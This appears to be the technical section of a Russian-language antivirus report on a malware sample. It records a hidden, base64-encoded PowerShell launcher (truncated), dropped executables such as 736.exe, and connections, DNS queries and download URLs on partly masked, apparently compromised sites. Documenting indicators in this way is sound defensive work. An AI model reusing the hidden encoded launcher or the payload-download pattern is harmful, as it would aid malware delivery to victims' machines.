Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAGkAawBxAGoAbgBhAGYAeABuAGEAYwA9ACcARQBoAHcAZwBsAG4AZQBnACcAOwAkAFoAeABiAGgAawB3AG8AYwB3ACAAPQAgACcANwAzADYAJwA7ACQARABhAHMAYwBxAGsAZQBoAHEAbQBwAD0AJwBEAHMAaABxAGcAdAB5AHYAbAB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1588
- %TEMP%\1109494.cvr
- %HOMEPATH%\736.exe
- %HOMEPATH%\736.exe
- %HOMEPATH%\736.exe
- 'zh###palace.com':80
- 'ra#######utz.edutrovao.com.br':80
- 'ho##.###ging.pixelcarve.net':80
- 'md##grp.com':443
- 'lu##.#m-host.net':80
- http://zh###palace.com/wp-admin/kfcuow/
- http://ho##.###ging.pixelcarve.net/content/YLcMZTn/
- http://ho##.###ging.pixelcarve.net/cgi-sys/suspendedpage.cgi
- http://lu##.#m-host.net/wp-content/ewww/wvo4jx/
- 'md##grp.com':443
- DNS ASK zh###palace.com
- DNS ASK ra#######utz.edutrovao.com.br
- DNS ASK ho##.###ging.pixelcarve.net
- DNS ASK md##grp.com
- DNS ASK lu##.#m-host.net
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABTAGkAawBxAGoAbgBhAGYAeABuAGEAYwA9ACcARQBoAHcAZwBsAG4AZQBnACcAOwAkAFoAeABiAGgAawB3AG8AYwB3ACAAPQAgACcANwAzADYAJwA7ACQARABhAHMAYwBxAGsAZQBoAHEAbQBwAD0AJwBEAHMAaABxAGcAdAB5AHYAbAB...' (со скрытым окном)